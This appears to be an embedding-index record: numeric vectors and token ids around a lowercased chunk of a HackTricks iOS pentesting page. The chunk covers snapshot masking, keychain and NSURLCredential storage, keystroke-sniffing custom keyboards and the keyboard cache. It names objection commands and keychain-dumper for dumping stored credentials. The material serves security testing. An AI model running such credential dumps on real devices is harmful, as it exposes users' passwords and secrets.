0.3791734278202057, -0.05670325830578804, 0.20331089198589325, -0.17152905464172363, 0.14915920794010162, -0.30660608410835266, -0.5387811064720154, -0.2502005100250244, 0.05315988510847092, 0.14923195540905, 0.054507844150066376, 0.5811043977737427, -0.3977990448474884, 0.09394753724336624, -0.6913508772850037, -0.2183343768119812, -0.26097816228866577, -0.09851877391338348, 0.6741532683372498, 0.21120265126228333, -0.742250919342041, 0.9078480005264282, 0.11010812222957611, 0.6966254115104675, -0.20609433948993683, 0.6172431707382202, 0.09508249163627625, 0.57671719789505, 0.15964439511299133, -0.12458207458257675, -0.09793348610401154, -0.08932293206453323, -0.374168336391449, -0.44971391558647156, -0.011282638646662235, -0.04612283408641815, 0.3588477075099945, -0.0875534787774086, -0.525387167930603, -0.43333351612091064, 0.4528118371963501, -0.15023799240589142, -0.6615038514137268, 0.3361436426639557, 0.012596197426319122, -0.58612459897995, 0.07057039439678192, 0.15454857051372528, -0.2447226345539093, -0.17123082280158997, -0.3779524564743042, -0.5596622824668884, 0.24351420998573303, 0.280535489320755, -0.033870141953229904, 0.771928608417511, -0.5796135663986206, -0.4640291929244995, 0.20850487053394318, -0.7078176736831665, -1.1747794151306152, 0.2841852605342865, -0.04316488280892372, -0.4656653106212616, 0.6030098795890808, 0.27823519706726074, 0.6770995259284973, 0.6191819310188293, -0.2553226947784424, -0.06886456161737442, 0.4058789610862732, 0.7433388233184814, 0.12701697647571564, 0.9990652799606323, 0.747983455657959, 0.16211466491222382, 0.456552118062973, -0.031852249056100845, 0.7294622659683228, -0.16571536660194397, -0.2893112897872925, -0.40703606605529785, -0.5536705851554871, -0.6009230017662048, 0.12896645069122314, 0.05770999938249588, 0.30344557762145996, -0.17032206058502197, -0.20768381655216217, -0.6329540610313416, 0.08284974098205566, -0.5101154446601868, 0.5730980038642883, 0.45480117201805115, 0.07107461243867874, 0.0028425196651369333, 0.28534868359565735, 0.06165164336562157, -0.6804971694946289, 4.8176703453063965, 0.5249523520469666, 0.17254307866096497, 0.3340729773044586, 0.20666994154453278, 0.5632073283195496, 1.0252957344055176, -0.46316930651664734, 0.005792112555354834, 0.07395235449075699, 0.16117937862873077, -0.2688058614730835, 0.3855864703655243, 0.10378756374120712, 0.011922772973775864, 0.1326674371957779, -0.3726816177368164, 0.397227942943573, 0.29633912444114685, -1.2447959184646606, -0.49039125442504883, 0.03400936722755432, -0.6969699859619141, 0.8546760082244873, 0.3717358410358429, 0.2944282591342926, 0.2738989591598511, -0.5848732590675354, -0.0908278375864029, -0.09977319836616516, 0.08838322758674622, -0.47333604097366333, 0.29064881801605225, -0.43750113248825073, -0.5297188758850098, 0.2517734169960022, 0.2511233389377594, -0.8214614987373352, -0.5658164620399475, 0.24454882740974426, -0.21279782056808472, 0.18383078277111053, 0.06954074651002884, 0.09320241957902908, 0.2912340760231018, 0.6864255666732788, -0.22084978222846985, 0.32190075516700745, 0.5691224336624146, -0.8966333270072937, 0.7836278080940247, -0.33343416452407837, 0.5038971900939941, -0.13042868673801422, -0.7173155546188354, -0.06203146651387215, 0.1635923534631729, 0.16226336359977722, 0.27038446068763733, 0.2831459045410156, 0.5629135966300964, -0.13782590627670288, 0.40490517020225525, -0.23546390235424042, -0.5476404428482056, 0.5348994731903076, 0.11108171939849854, 0.44512996077537537, -0.11197221279144287, -0.5637518763542175, 0.0536537729203701, -0.4139934182167053, -0.4445904493331909, -0.6879330277442932, 0.5669431090354919, -0.1261017769575119, -0.35100382566452026, 0.6411468386650085, 0.3035178482532501, -0.7333373427391052, -0.190884530544281, -0.6536130905151367, -0.5436406135559082, 0.488777220249176, 0.6887750029563904, 0.5041873455047607, -0.2008768916130066, -0.7501347661018372, 0.11780663579702377, 0.3840964436531067, 0.21052215993404388, 0.992483913898468, -0.4514721632003784, 0.19343574345111847, 0.22203172743320465 ]
[ 4339, 1996, 8417, 1997, 1037, 24471, 2140, 2000, 1037, 5371, 1012, 1017, 1012, 17053, 2064, 2022, 2036, 9776, 2011, 4292, 1996, 17053, 3343, 2000, 1012, 2025, 8095, 15096, 1012, 2009, 2097, 4487, 19150, 23977, 17053, 1999, 2151, 4827, 1010, 2593, 1999, 3638, 2030, 2006, 9785, 1012, 20057, 12326, 26760, 10222, 22507, 2017, 2811, 1996, 2188, 6462, 1010, 16380, 3138, 1037, 20057, 12326, 1997, 1996, 2783, 3898, 2000, 2022, 2583, 2000, 2079, 1996, 6653, 2000, 1996, 4646, 2006, 1037, 2172, 5744, 2121, 2126, 1012, 2174, 1010, 2065, 7591, 2951, 2003, 2556, 1999, 1996, 2783, 3898, 1010, 2009, 2097, 2022, 5552, 1999, 1996, 3746, 1006, 2029, 29486, 2015, 2408, 2128, 27927, 2015, 1007, 1012, 2122, 2024, 1996, 20057, 12326, 2015, 2008, 2017, 2064, 2036, 3229, 3313, 15135, 1996, 2188, 3898, 2000, 6942, 2090, 18726, 1012, 4983, 1996, 18059, 2003, 7173, 29162, 1010, 1996, 17346, 3791, 2000, 2031, 3229, 2000, 1996, 5080, 4895, 23467, 2098, 2000, 2156, 2122, 12117, 12326, 2015, 1012, 2011, 12398, 1996, 2197, 20057, 12326, 2003, 8250, 1999, 1996, 4646, 1005, 1055, 5472, 8758, 1999, 3075, 1013, 17053, 2015, 1013, 20057, 12326, 2015, 1013, 2030, 3075, 1013, 17624, 6277, 1013, 20057, 12326, 2015, 19622, 1006, 1996, 9480, 7588, 2064, 1005, 1056, 3229, 1996, 6764, 27268, 6633, 2013, 22834, 2595, 1021, 1012, 1014, 1007, 1012, 2320, 2126, 2000, 4652, 2023, 2919, 9164, 2003, 2000, 2404, 1037, 8744, 3898, 2030, 6366, 1996, 7591, 2951, 2077, 2635, 1996, 20057, 12326, 2478, 1996, 4646, 4305, 16454, 2121, 5963, 16365, 1006, 1007, 3853, 1012, 1996, 2206, 2003, 1037, 7099, 2128, 16969, 3508, 4118, 2008, 2097, 2275, 1037, 12398, 12117, 12326, 1012, 9170, 1024, 2797, 13075, 4281, 9581, 3351, 1024, 21318, 9581, 3351, 8584, 1029, 4569, 2278, 4646, 4305, 16454, 2121, 5963, 16365, 1006, 1035, 4646, 1024, 21318, 29098, 19341, 3508, 1007, 1063, 2292, 2026, 8193, 3678, 1027, 21318, 9581, 3351, 8584, 1006, 3746, 1024, 1001, 3746, 22779, 7941, 1006, 7692, 18442, 1024, 1000, 2058, 8485, 9581, 3351, 1000, 1007, 1007, 2026, 8193, 3678, 1012, 4853, 1027, 21318, 18182, 1012, 2364, 1012, 19202, 4281, 9581, 3351, 1027, 2026, 8193, 3678, 3332, 1029, 1012, 9909, 12083, 8584, 1006, 2026, 8193, 3678, 1007, 1065, 4569, 2278, 4646, 29602, 16136, 2121, 29278, 13910, 22494, 4859, 1006, 1035, 4646, 1024, 21318, 29098, 19341, 3508, 1007, 1063, 4281, 9581, 3351, 1029, 1012, 6366, 19699, 22225, 6279, 2121, 8584, 1006, 1007, 1065, 7863, 1011, 1039, 1024, 1030, 3200, 1006, 21318, 9581, 3351, 8584, 1008, 1007, 4281, 9581, 3351, 1025, 1011, 1006, 11675, 1007, 4646, 4305, 16454, 2121, 5963, 16365, 1024, 1006, 21318, 29098, 19341, 3508, 1008, 1007, 4646, 1063, 21318, 9581, 3351, 8584, 1008, 2026, 8193, 3678, 1027, 1031, 1031, 21318, 9581, 3351, 8584, 2035, 10085, 1033, 1999, 4183, 24415, 9581, 3351, 1024, 1030, 1000, 2058, 8485, 9581, 3351, 1012, 1052, 3070, 1000, 1033, 1025, 2969, 1012, 4281, 9581, 3351, 1027, 2026, 8193, 3678, 1025, 2969, 1012, 4281, 9581, 3351, 1012, 19202, 1027, 21318, 18182, 1012, 2364, 18182, 1012, 19202, 1025, 1031, 2969, 1012, 3332, 9909, 12083, 8584, 1024, 2026, 8193, 3678, 1033, 1025, 1065, 1011, 1006, 11675, 1007, 4646, 29602, 16136, 2121, 29278 ]
hack_tricks
43.txt
12
##eground : ( uiapplication * ) application { [ self. backgroundimage removefromsuperview ] ; } this sets the background image to overlayimage. png whenever the application is backgrounded. it prevents sensitive data leaks because overlayimage. png will always override the current view. keychaintools like keychain - dumper can be used to dump the keychain ( the dive must be jailbroken ). you can also use ios keychain dump from objection. nsurlcredentialnsurlcredential is the perfect class to store username and password in the keychain. no need to bother with nsuserdefaults nor any keychain wrapper. once the user is logged in, you can store his username and password to the keychain : nsurlcredential * credential ; credential = [ nsurlcredential credentialwithuser : username password : password persistence : nsurlcredentialpersistencepermanent ] ; [ [ nsurlcredentialstorage sharedcredentialstorage ] setcredential : credential forprotectionspace : self. loginprotectionspace ] ; you can use objection's ios nsurlcredentialstorage dump to dump these secrets. custom keyboards / keyboard cachefrom ios 8. 0 apple allows to install custom extensions for ios like custom keyboards. the installed keyboards can be managed via settings > general > keyboard > keyboards custom keyboards can be used to sniff the keystrokes and send them to the attacker server. however, note that custom keyboards requiring networking connectivity will be notified to the user. also, the user can switch to a different ( more trusted ) keyboard for introducing the credentials. moreover, applications can prevent its users from using custom keyboards within the app ( or at least for sensitive parts of the app ). it's recommended to not allow third party keyboards if you consider the users won't need themnote that because of auto - correct and auto - suggestions, the default ios keyboard will capture and store each non - standard word word in a cache file if the attribute securettextentry is not set to true or if autocorrectiontype is not set to uitextautocorrectiontypeno. by default the keyboards store this cache inside the applications sandbox in library / keyboard / { locale } - dynamic - text. dat file or
[ 0.4460045099258423, -0.5771763920783997, -0.061180248856544495, 0.2983584702014923, -0.09479530900716782, 0.2361435741186142, -0.14921823143959045, 0.31076204776763916, 0.10274893790483475, 0.6318689584732056, 0.03185085207223892, -0.23150672018527985, -0.07580388337373734, -0.5364794135093689, -0.5602796673774719, -0.10407198965549469, -0.14600911736488342, -0.15137608349323273, -0.24331195652484894, -0.13867498934268951, 0.4718134105205536, 0.07135654240846634, -0.942539632320404, -1.4079241752624512, 0.13246390223503113, 0.7520654201507568, 1.0523287057876587, -0.21795989573001862, 0.3225961923599243, 0.8707965612411499, -0.3857484757900238, -0.07626017183065414, -0.1252085417509079, -0.4770488142967224, 0.05958310514688492, -0.13983389735221863, 0.7036107182502747, -0.4800599217414856, -0.08802841603755951, 0.005656166467815638, 0.3580361008644104, -0.4091172516345978, -0.09107857197523117, -0.5380191802978516, -0.33296725153923035, -0.45810213685035706, 0.36210575699806213, 0.05082210898399353, 0.506690263748169, 0.26356571912765503, 0.746600866317749, -0.13911741971969604, -0.4174361824989319, 0.21557539701461792, 0.21058157086372375, 0.5709190368652344, 0.04426993057131767, 0.14380788803100586, 0.03227776661515236, 0.4805716872215271, -0.008381896652281284, 0.9534760117530823, 0.22386911511421204, -1.2468972206115723, -0.19859614968299866, 0.5268406867980957, -0.43368715047836304, 0.0796504020690918, -0.6749815344810486, -0.5041539072990417, -0.23098750412464142, 0.07445921748876572, -0.643467128276825, -0.7129830718040466, -0.18057018518447876, -0.3927520513534546, 0.2653154730796814, -0.5909531712532043, -0.31463128328323364, 0.918144702911377, -0.42515480518341064, 0.38334792852401733, 0.047202788293361664, -0.35657331347465515, -0.3070825934410095, 0.026480594649910927, 0.3921073377132416, 0.1840699166059494, -0.4619489908218384, -0.5374858379364014, 0.49702125787734985, 0.3577239215373993, -0.30758821964263916, -0.6789212822914124, 0.4766213297843933, 0.6375502347946167, -0.5039392113685608, -0.10103566944599152, 0.3353714942932129, -0.06509093195199966, 0.44377022981643677, 0.2787547707557678, 0.239638552069664, 0.8559585809707642, 0.12533392012119293, 0.46097058057785034, 0.9456075429916382, -0.31460800766944885, -0.06088356673717499, -0.5560783743858337, 0.47357630729675293, -0.2535097002983093, 0.4804181158542633, -0.3497943878173828, -0.40571653842926025, 0.13290369510650635, 0.7450698614120483, 0.0378335677087307, -0.1973593682050705, 0.7507126927375793, 0.028757866472005844, -0.13714656233787537, 0.6411275863647461, -0.430650919675827, 0.3200770616531372, 0.5292864441871643, 0.3005983531475067, 0.5269873738288879, -0.5753044486045837, -0.2192901223897934, -0.12082038074731827, -0.14589326083660126, -0.031095584854483604, 0.3752797842025757, -0.6711323857307434, -0.051255129277706146, 0.4851868152618408, 0.05122694373130798, 0.3592265546321869, -0.5948407053947449, -0.0236849095672369, 0.13206696510314941, 0.3475988507270813, 1.1994858980178833, 0.19966723024845123, -0.37234997749328613, -0.7841097116470337, -0.34126007556915283, 0.0324135348200798, -0.22295911610126495, 0.07346749305725098, 0.49432650208473206, 0.5936892032623291, -0.4174518883228302, -0.2668478488922119, -0.03200771287083626, -0.1110202893614769, 0.843468964099884, -0.4443299174308777, -0.08504749089479446, -0.1988677978515625, 0.8693557977676392, 0.1823747307062149, 0.46841317415237427, -0.3038405478000641, 0.06104699894785881, -0.21465414762496948, -0.05469691380858421, -0.4307730793952942, 0.4819239377975464, 0.3853051960468292, -0.5117570757865906, 0.28732946515083313, -0.17716990411281586, 1.27932608127594, 0.42119327187538147, 0.11568914353847504, 0.3787361681461334, 0.25182998180389404, 0.6000566482543945, -0.2378380298614502, 0.23665417730808258, -0.041836898773908615, 0.8693456053733826, 0.2658608555793762, -0.18227271735668182, -0.4202219545841217, -0.7559522390365601, -0.24220864474773407, -0.16257056593894958, -0.5277498364448547, 0.601409912109375, -0.4359349012374878, 0.0406152606010437, 0.6931234002113342, -0.10174933820962906, -1.393033504486084, -0.4292566478252411, 0.1712166965007782, -1.3075138330459595, -0.6141601204872131, -0.5441689491271973, 0.570298969745636, 0.649395763874054, -0.2872985005378723, 0.4748784601688385, 1.1753990650177002, 0.6081292629241943, -0.2819918692111969, 1.064597249031067, 0.5073351860046387, -0.4040529727935791, -0.801811933517456, -0.0045525506138801575, -0.07316485792398453, -0.5390141606330872, 0.06899531185626984, 0.020710308104753494, 0.14487168192863464, -0.12638014554977417, -0.20202745497226715, 0.30721423029899597, 0.6875314712524414, 0.08389443904161453, -0.06836670637130737, 0.051634784787893295, 0.0824694111943245, 0.7676255702972412, -0.4579913020133972, -0.08462768793106079, 0.11552266776561737, 0.6845911145210266, 0.4199507534503937, 1.042522668838501, -0.09834694117307663, -0.46886777877807617, -0.3469771146774292, -0.07137211412191391, 0.42655667662620544, 0.002773886313661933, -0.23378384113311768, 0.6270461678504944, -0.022629838436841965, 0.7722432613372803, 0.5420815944671631, -0.33736667037010193, -0.03615202009677887, -0.16267575323581696, 0.6452121138572693, 0.1768258512020111, -0.5274108648300171, 0.9566786885261536, 0.49119770526885986, -0.22733677923679352, -0.8632494807243347, -0.016828503459692, 0.773356556892395, 0.8272475600242615, -0.7196703553199768, -0.5805747509002686, -0.4429280757904053, -0.12888766825199127, -0.20550045371055603, 0.1460065096616745, -0.10347411781549454, 0.9151461720466614, -0.23811107873916626, 0.6076246500015259, -0.4773879945278168, -0.6330495476722717, -0.8732545971870422, -0.6034132242202759, -0.838286280632019, -0.45791998505592346, -0.6097981333732605, -0.18529291450977325, 0.09654839336872101, -0.36758098006248474, 0.6522080898284912, -0.9677062630653381, -0.45555800199508667, 0.027590205892920494, 0.33092865347862244, 0.5032862424850464, 0.1943424791097641, -0.09296926856040955, -0.9139032363891602, 0.5998532772064209, 0.05275706946849823, 0.48725464940071106, -0.4518759548664093, 0.03628779947757721, -0.14727330207824707, -0.22136957943439484, -0.07678581029176712, -0.94903165102005, 0.16243697702884674, 0.16747581958770752, -0.565491259098053, 0.2041929066181183, 0.32345497608184814, 0.5628905892372131, 0.4730331301689148, 0.033282749354839325, -0.5242036581039429, 0.8123704791069031, -0.3255437910556793, -0.3371552526950836, 0.7630017995834351, 0.45227500796318054, -0.6177099347114563, 0.6043909788131714, 0.28271105885505676, 1.022341012954712, -0.24426430463790894, 0.20022810995578766, 0.5805369019508362, 0.14861533045768738, -0.17191007733345032, 0.08680179715156555, 0.031020525842905045, -0.5387828350067139, -0.7499960064888, -0.09549689292907715, 0.2218059003353119, 0.12333659082651138, -0.16532227396965027, -0.6071951985359192, 0.3912208378314972, -0.5087519288063049, -0.6134033203125, -0.02283395454287529, 0.14677222073078156, 0.6496303081512451, 0.08438928425312042, 0.4114971160888672, -0.2582366168498993, -0.484284907579422, 0.473624050617218, 0.21675463020801544, 0.39659810066223145, -0.6206060647964478, 0.3468703329563141, -0.33924156427383423, -0.02668023481965065, 0.7593033909797668, 0.35952162742614746, -0.6634670495986938, -0.8615339398384094, -0.17775127291679382, -0.002595542697235942, -0.47280192375183105, 0.4524526298046112, 0.48086974024772644, 0.9951199889183044, 0.5014024972915649, -0.25414425134658813, 0.14539188146591187, 0.06644318997859955, 0.37342125177383423, 0.140867680311203, -0.3552732765674591, 0.359519898891449, 0.3632339835166931, 0.33353301882743835, -0.569421112537384, -0.19620229303836823, 0.7244590520858765, 0.2756391167640686, 0.15791979432106018, 0.47631168365478516, -0.34068799018859863, -0.06312180310487747, 0.5720275044441223, -0.6315808296203613, -1.0611082315444946, 0.5825921297073364, -0.13844028115272522, 0.09995243698358536, -0.3024114668369293, 0.20650628209114075, -0.42754310369491577, 0.10947030782699585, 0.9697602391242981, 0.7401631474494934, -0.6981018781661987, -0.8405770659446716, -0.078285813331604, 0.022166859358549118, -0.27637138962745667, 0.26335155963897705, 0.09666985273361206, 0.14205904304981232, -0.6298460960388184, -0.9691592454910278, -0.45496177673339844, 0.2659144401550293, 0.6905754208564758, 0.9964576959609985, 1.0100010633468628, 0.563299298286438, 0.9124876260757446, -0.45893213152885437, 0.3999127745628357, -1.0974186658859253, -0.04641314223408699, -0.6433034539222717, 0.8075076341629028, -0.33708861470222473, -0.2158770114183426, -0.452892929315567, -0.14200571179389954, -0.0028821874875575304, 0.376258909702301, -0.003425806760787964, 0.29065147042274475, -0.6067301630973816, -0.2940562665462494, -0.19413471221923828, 0.09186292439699173, -0.7083191871643066, -0.32653412222862244, -0.29299724102020264, 0.241605743765831, 0.9352869987487793, -0.4402340352535248, -0.05267101526260376, -0.7031805515289307, -0.13269658386707306, 0.031027046963572502, -0.2375386655330658, -0.4066161811351776, -0.34760868549346924, -0.18342892825603485, -0.3472793400287628, 0.4776588976383209, 0.518186092376709, 0.3292848467826843, -0.2734887897968292, -0.7069742679595947, -0.1159859374165535, 1.1923434734344482, -0.6735650300979614, -0.7670852541923523, -0.29529955983161926, 0.7168897390365601, 0.0995863601565361, 0.34179598093032837, -0.10914160311222076, -0.11535463482141495, 0.5563992857933044, -0.7274383902549744, 0.7765344381332397, -0.162353515625, -0.08576264977455139, -0.19596661627292633, 0.2373201549053192, 0.17844615876674652, 0.39995869994163513, -0.74200040102005, 0.4317164421081543, -0.127833291888237, 0.19589057564735413, 0.02511558309197426, -0.25615981221199036, 0.839030921459198, -0.10172311216592789, -0.28048473596572876, -0.15348683297634125, 0.15367639064788818, 0.16980186104774475, 0.5130453109741211, -0.3984859883785248, -0.959392249584198, 0.5733840465545654, -0.4659726321697235, 1.2188746929168701, 0.1393628567457199, -0.3470379710197449, -0.0392339713871479, -0.4491167664527893, 1.1187100410461426, -0.26202690601348877, 0.32492026686668396, -1.3646702766418457, -0.7134880423545837, -0.30869635939598083, 0.24780388176441193, 0.07089228183031082, 0.46480855345726013, 0.2533835172653198, -0.29700958728790283, -0.3680975139141083, 0.38639509677886963, -0.8530674576759338, -0.4459989070892334, -0.9134020209312439, -0.2988720238208771, -0.119724340736866, -0.23500633239746094, 0.9108296632766724, 0.014605849049985409, -0.332733690738678, 0.7364333868026733, 0.09654597193002701, 0.1422625035047531, -0.8527190089225769, -0.2519471347332001, -0.289730042219162, 0.28019967675209045, -0.6262152791023254, 0.3709661662578583, 0.035945478826761246, -0.3682762682437897, 0.4452454149723053, 0.48409339785575867, 0.10299546271562576, -0.12910383939743042, 0.043407972902059555, 0.8622440695762634, 0.5610600709915161, -0.5373482704162598, 0.07166311144828796, 0.5142455697059631, 0.1872767060995102, 0.30134302377700806, -0.5733336806297302, -0.2726162374019623, -0.8404001593589783, -0.2849271297454834, 0.04564376920461655, -0.4916854202747345, 0.651279628276825, -0.7039284706115723, -0.6901040077209473, -0.1822618544101715, 0.08355385810136795, 0.212593212723732, -1.0733160972595215, 0.2139367163181305, -0.02640092372894287, 0.2589820325374603, -0.14087042212486267, 0.07034815847873688, -0.5711690783500671, -0.43743696808815, -0.5208427906036377, 0.3745659291744232, 0.15626263618469238, 0.1455504447221756, 0.14849010109901428, 0.36089450120925903, 0.19477996230125427, 0.06227690726518631, -0.8097108006477356, -0.46426644921302795, 0.388252317905426, 0.14525136351585388, -0.21715255081653595, 0.6591377258300781, -1.0044790506362915, 0.652053713798523, 0.3208045959472656, 0.23214443027973175, 0.24688051640987396, -0.01664462871849537, -0.0074602337554097176, 0.5277301669120789, 0.5271192789077759, -0.738128662109375, 0.01139517780393362, -0.32269638776779175, 0.6485553979873657, 0.2874275743961334, -0.3652259409427643, -0.9171298742294312, 0.3250196576118469, -0.7004560232162476, -1.5245901346206665, 0.45825356245040894, 0.1297224909067154, 0.20763352513313293, 0.1843041479587555, -0.4159502685070038, 0.25378096103668213, -0.5774169564247131, 0.14146535098552704, 0.6744869947433472, 0.2517804503440857, 0.3216605484485626, -0.8180652856826782, 1.0431305170059204, 0.3526674807071686, -0.4045698344707489, -0.10605736821889877, 0.1663845181465149, -0.4217255711555481, 0.07783842831850052, -0.40162503719329834, 0.058643270283937454, -0.6206237077713013, 0.2096833884716034, -0.030171526595950127, 0.11759698390960693, 0.57694011926651, -0.15410742163658142, -0.46392348408699036, 0.0863480195403099, -0.06346054375171661, -0.2503027319908142, 0.2595667839050293, 0.14496281743049622, 0.2141474336385727, -0.34877046942710876, -0.6270633935928345, 0.017198335379362106, -0.2191493809223175, 0.15256743133068085, 0.7820796370506287, 0.18359112739562988, -0.26945239305496216, 0.8124688863754272, -0.12924551963806152, -0.4278450310230255, -0.2515277564525604, -0.3245043158531189, -0.7384710311889648, 0.435147762298584, -0.3237220346927643, 0.4674667716026306, 0.05329418554902077, 0.05464829131960869, -0.05252153053879738, 0.44822800159454346, -0.25989457964897156, 0.0620940700173378, -0.6782464981079102, 0.5150858163833618, -0.12294593453407288, -0.07995862513780594, 0.5603721737861633, -1.0753326416015625, -0.5059369802474976, -0.6117604970932007, 0.054783906787633896, 0.15571627020835876, -0.03546057641506195, 0.8925170302391052, -0.35964512825012207, -0.04487917199730873, 0.09345249831676483, -0.5838345885276794, 0.8643684387207031, -0.05385054647922516, 0.42525890469551086, 0.8182763457298279, 0.43261298537254333, -0.5774771571159363, -0.30977872014045715, 0.20225827395915985, -0.1313563585281372, 0.021575715392827988, -0.7329340577125549, -0.28088778257369995, -0.197975292801857, 0.5678239464759827, -0.3337803781032562, -0.16984273493289948, -0.7670010924339294, -0.799953818321228, -0.13184401392936707, 0.6017832159996033, -0.3642992377281189, -0.43371763825416565, 0.24426423013210297, 0.23729754984378815, -0.05394715443253517, -0.2366771697998047, 0.5985745191574097, -0.962113618850708, 0.5451229810714722, -1.0890233516693115, 0.3745882511138916, -0.7375093102455139, -0.5190142393112183, -0.4689156115055084, -0.25302040576934814, -0.7379251718521118, -0.7348748445510864, 0.04788121208548546, 0.326478511095047, -0.6638944745063782, 0.19851034879684448, -0.7557498812675476, -0.08437684178352356, -0.46014273166656494, -0.3736552298069, 0.22245924174785614, 0.6176141500473022, -0.12755431234836578, -0.2658507227897644, 0.224016934633255, 0.16846497356891632, 0.8264992237091064, -0.5007020235061646, 0.009822903200984001, -0.3367602527141571, 0.13889053463935852, -0.021113641560077667, 0.03471795469522476, -0.5403255820274353, 0.5781077146530151, -0.3350372910499573, -0.739722728729248, -0.10606459528207779, -0.16912928223609924, -0.2044343799352646, 0.1158534586429596, -0.41262122988700867, 0.06212133914232254, 0.5537328124046326, 0.6728563904762268, 0.810400664806366, -0.4170738756656647, 0.5139627456665039, 0.46325817704200745, -0.07440783083438873, -0.21569177508354187, -0.014702215790748596, -0.2541007101535797, -0.5854044556617737, 0.013185281306505203, 0.11788742989301682, -0.5037121772766113, 0.4521346688270569, -0.5384869575500488, 0.0076083107851445675, -0.5833367109298706, 0.10351748019456863, 0.7988892793655396, 0.059590984135866165, 0.19631153345108032, -0.16059786081314087, -0.13740162551403046, 0.29800260066986084, -0.8427028656005859, 0.10536246001720428, -0.8001784086227417, -0.18866518139839172, -0.3111346960067749, -0.3796708285808563, -0.09402032196521759, -0.4374273121356964, 0.20924510061740875, 0.40988296270370483, -0.30005738139152527, 0.049002885818481445, -0.15242473781108856, -0.22116263210773468, 0.4186535179615021, 0.7830522656440735, -0.5855221748352051, -0.261675626039505, -0.5595226287841797, 0.3471065163612366, -0.6565654873847961, -0.9126853942871094, 0.3379051089286804, 0.8556069135665894, 0.3291867673397064, -0.55014568567276, -0.36535516381263733, 0.12492289394140244, 0.7334930896759033, 0.1487809717655182, 0.6345604658126831, -0.03541015833616257, -0.8853145837783813, 0.8338235020637512, -0.7035890221595764, 0.5292723774909973, -0.3975051939487457, -0.014763942919671535, 0.1376343071460724, -0.46934059262275696, -0.8179557919502258, 0.1105990782380104, 0.1416524350643158, -0.16075538098812103, 0.6144372224807739, 0.3272896111011505, 0.3793747127056122, -0.5076507329940796, 0.17941197752952576, -0.8872120380401611, 0.26178082823753357, 0.5071850419044495, -0.1550091803073883, 0.31848081946372986, 0.5400395393371582, 0.6502167582511902, -0.40853336453437805, -0.15707695484161377, 0.23299100995063782, 0.43501973152160645, -0.1867239773273468, 0.7410234808921814, -0.3847011923789978, -0.20185960829257965, 0.3039158880710602, -0.44494375586509705, -0.04325319454073906, 0.2534175515174866, 0.1584092229604721, -0.34500133991241455, 0.16434010863304138, 1.0444773435592651, -0.7117562294006348, 0.7653424739837646, 0.199520081281662, -0.17053811252117157, 0.3899300694465637, -0.3755878210067749, -0.470659077167511, 0.9535220861434937, 0.6413038372993469, 0.6475101709365845, 0.48039746284484863, 0.5497803092002869, -0.074810691177845, -0.4269651174545288, 0.017231620848178864, -0.13598310947418213, -0.638008713722229, 0.3531293570995331, 0.01788116618990898, -0.2692616879940033, -1.0368932485580444, 0.18809740245342255, 0.2709067165851593, -0.11084221303462982, 0.30039119720458984, -0.12302909791469574, 0.6111999750137329, -0.2440507858991623, 0.5462613701820374, -0.30181756615638733, 0.3045218288898468, 0.4568869173526764, -0.18466205894947052, -1.1533931493759155, 1.176253080368042, -0.39818382263183594, 0.5686675906181335, 0.426943302154541, 0.5425149202346802, 0.15771225094795227, 0.8082497715950012, 0.13645753264427185, -0.8123693466186523, 0.3837277293205261, 0.022511260583996773, -0.2355310171842575, -0.1253625452518463, -0.08537475019693375, 0.20911915600299835, 0.5830920934677124, -0.3294861316680908, -0.25460559129714966, -0.397275447845459, 0.16234190762043, 0.060980819165706635, -0.893303394317627, 0.48923271894454956, -0.12220453470945358, -0.8038068413734436, 0.4307129681110382, -0.07804644852876663, 0.25859248638153076, 0.3791598379611969, -0.7827167510986328, -0.3223207890987396, -0.2596466839313507, -0.22490933537483215, -0.23319761455059052, 1.271920919418335, -0.3786246180534363, -0.5276655554771423, -0.4525991678237915, -0.9059846997261047, -0.2760082483291626, -0.1536465883255005, -0.15051396191120148, -0.2043588012456894, 0.148726686835289, 0.2313259243965149, 1.0075547695159912, 0.6229866743087769, -0.3384099006652832, -0.42575231194496155, -0.1435541957616806, 0.5740885734558105, -0.8586034774780273, 0.5956770777702332, 0.692895233631134, -0.02861591801047325, 0.6106897592544556, -0.2708504796028137, 0.7248691916465759, -0.3598567247390747, -0.2803879380226135, -0.29415950179100037, 0.25351786613464355, -0.1898375302553177, -0.4171626567840576, -0.13615959882736206, 0.2549442946910858, -0.4012763798236847, -0.07633209228515625, -1.0101381540298462, 0.24530303478240967, -0.6670656800270081, 0.845084547996521, -0.13921624422073364, 0.030477147549390793, -0.1661314219236374, 0.25042101740837097, 0.7041893601417542, -1.4648826122283936, 4.3759613037109375, 0.20811979472637177, -0.17669004201889038, 0.3434276878833771, 0.19166451692581177, 0.5687263011932373, 1.2476205825805664, -0.7461428046226501, -0.22269706428050995, -0.6334539651870728, 0.05591254308819771, -0.3087843656539917, 0.034635353833436966, 0.18088942766189575, 0.3029279112815857, 0.37640202045440674, -0.5882959365844727, -0.08417773991823196, 0.43951067328453064, -1.127550482749939, -0.8716446161270142, 0.1708139330148697, -0.09083345532417297, 1.1236960887908936, 0.49267682433128357, 0.44221118092536926, 0.20271293818950653, -0.8679784536361694, -0.4043428897857666, 0.01294663455337286, 0.05423518642783165, -0.5756494402885437, 0.05071832612156868, -0.6239362955093384, -0.7589901685714722, 0.6479120850563049, 0.26871803402900696, -0.9635969996452332, -0.5416483879089355, 0.5634554624557495, 0.25295448303222656, -0.042336344718933105, 0.3457771837711334, -0.34204891324043274, -0.11218573898077011, 0.6526305079460144, -0.6851999163627625, 0.7566933631896973, 1.066967487335205, -0.6427521705627441, 0.7035778760910034, -0.013581234961748123, 0.11315203458070755, -0.41966482996940613, -0.3790268301963806, 0.4105101227760315, -0.18296894431114197, -0.38892316818237305, 0.26727885007858276, 0.07938017696142197, 0.4283033609390259, -0.5201597809791565, 0.02518238127231598, -0.26805660128593445, -0.706109881401062, 0.4690740406513214, 0.030327381566166878, 0.8234453797340393, -0.5900229215621948, -0.23688454926013947, -0.36039334535598755, -0.5629054307937622, -0.7012298107147217, -0.18515875935554504, 1.027660846710205, -0.2958580553531647, -0.026918450370430946, 0.654588520526886, 0.6675687432289124, -1.0240579843521118, -0.23502928018569946, -0.4555176794528961, -0.8752586245536804, -0.3016066253185272, 0.7830698490142822, 0.8250070214271545, 0.2037903219461441, -0.9047210216522217, 0.32869386672973633, -0.2072456032037735, 0.37154048681259155, 0.4215332269668579, -0.4157460927963257, -0.052108459174633026, 0.29971960186958313 ]
